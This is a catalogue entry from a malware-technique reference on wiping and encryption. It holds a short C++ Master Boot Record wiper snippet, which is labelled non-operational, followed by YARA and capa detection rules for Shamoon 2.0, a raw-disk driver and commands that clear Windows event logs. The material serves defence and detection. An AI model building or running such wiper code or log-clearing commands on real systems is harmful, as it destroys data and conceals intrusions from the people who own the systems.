Wiping or Encrypting

Malware can use wiping or encryption techniques to remove its trace from the system. They can also use this technique as a decoy but also for sabotage operations.

U0301

Code Snippets

Unprotect

Description

Warning: the code below is a simple MBR wiper. It is currently not operational for obvious reasons.

#include <Windows.h>
#include <iostream>
#include <ctime>
#include <stdio.h>

#define MBR_SIZE 512

using namespace std;

int WipeMBR(void) {
    char dmbr[MBR_SIZE];

    ZeroMemory(&dmbr, sizeof(dmbr));
    HANDLE disk = CreateFile((LPCSTR)"\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    WriteFile(disk, dmbr, MBR_SIZE, &write, NULL);
    CloseHandle(disk);
    return 0;
}

int main() {
    cout << "Start Wiping" << endl;
    WipeMBR();
    return 0;
}

Detection Rules

rule UNPROTECT_wiping_event
{
    meta:
        description = "Rule to detect wiping events logs"
        author = "McAfee ATR team | Thomas Roccia"
        date = "2020-11-10"
        rule_version = "v1"
        mitre = "T1070"
        hash = "c063c86931c662c1a962d08915d9f3a8"

    strings:
        $s1 = "wevtutil.exe" ascii wide nocase
        $s2 = "cl Application" ascii wide nocase
        $s3 = "cl System" ascii wide nocase
        $s4 = "cl Setup" ascii wide nocase
        $s5 = "cl Security" ascii wide nocase
        $s6 = "sl Security /e:false" ascii wide nocase
        $s7= "usn deletejournal /D" ascii wide nocase

    condition:
        uint16(0) == 0x5a4d and 4 of them
}

import "pe"

rule Shamoon2_Wiper {
   meta:
      description = "Detects Shamoon 2.0 Wiper Component"
      author = "Florian Roth"
      reference = "https://goo.gl/jKIfGB"
      date = "2016-12-01"
      score = 70
      hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
      hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
   strings:
      $a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
      $x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
      $s1 = "UFWYNYNTS" fullword wide
      $s2 = "\\\\?\\ElRawDisk" fullword wide
   condition:
      ( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
}

rule EldoS_RawDisk {
   meta:
      description = "EldoS Rawdisk Device Driver (Commercial raw disk access driver - used in Operation Shamoon 2.0)"
      author = "Florian Roth (with Binar.ly)"
      reference = "https://goo.gl/jKIfGB"
      date = "2016-12-01"
      score = 50
      hash1 = "47bb36cd2832a18b5ae951cf5a7d44fba6d8f5dca0a372392d40f51d1fe1ac34"
      hash2 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
   strings:
      $s1 = "g\\system32\\" fullword wide
      $s2 = "ztvttw" fullword wide
      $s3 = "lwizvm" fullword ascii
      $s4 = "FEJIKC" fullword ascii
      $s5 = "INZQND" fullword ascii
      $s6 = "IUTLOM" fullword wide
      $s7 = "DKFKCK" fullword ascii

      $op1 = { 94 35 77 73 03 40 eb e9 }
      $op2 = { 80 7c 41 01 00 74 0a 3d }
      $op3 = { 74 0a 3d 00 94 35 77 }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 2000KB and 4 of them )
}
rule:
  meta:
    name: clear the Windows event log
    namespace: anti-analysis/anti-forensic/clear-logs
    author: michael.hunhoff@fireeye.com
    scope: basic block
    att&ck:
      - Defense Evasion::Indicator Removal on Host::Clear Windows Event Logs [T1070.001]
    examples:
      - 82BF6347ACF15E5D883715DC289D8A2B:0x14005E0C0
  features:
    - and:
      - api: advapi32.ElfClearEventLogFile
      - optional:
        - api: advapi32.OpenEventLog

Additional Resources

Subscribe to our Newsletter and don't miss important updates